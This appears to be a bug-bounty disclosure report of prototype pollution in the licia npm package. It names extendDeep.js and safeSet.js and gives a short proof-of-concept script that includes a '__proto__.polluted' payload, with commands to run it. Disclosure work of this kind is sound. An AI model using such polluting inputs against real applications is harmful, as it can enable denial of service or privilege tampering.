Prototype Pollution in liriliri/licia

Valid

Reported on

Sep 15th 2020

Description

licia package is vulnerable to prototype pollution issue files can be found in https://github.com/liriliri/licia/blob/master/src/e/extendDeep.js & https://github.com/liriliri/licia/blob/master/src/s/safeSet.js#L46

Proof of Concept

Creating poc filed

var utils = require('licia');
var src = {};
let object = utils.extendDeep({}, JSON.parse('{ "myProperty": "a", "prototype" : { "isAdmin" : true } }'));
console.log(object.prototype.isAdmin);

var licia = require('licia');
var src = {};
licia.safeSet(src, "__proto__.polluted", "pwned!");
console.log(polluted);

Execute command npm install licia
Execute command node poc.js

https://drive.google.com/file/d/1Ef61xgYB6Tzq1We_OiitWUqne0H9skGe/view?usp=sharing

Impact

Prototype pollution which could lead to DOS and RCE

Occurrences

extendDeep.js L48

safeSet.js L46

to join this conversation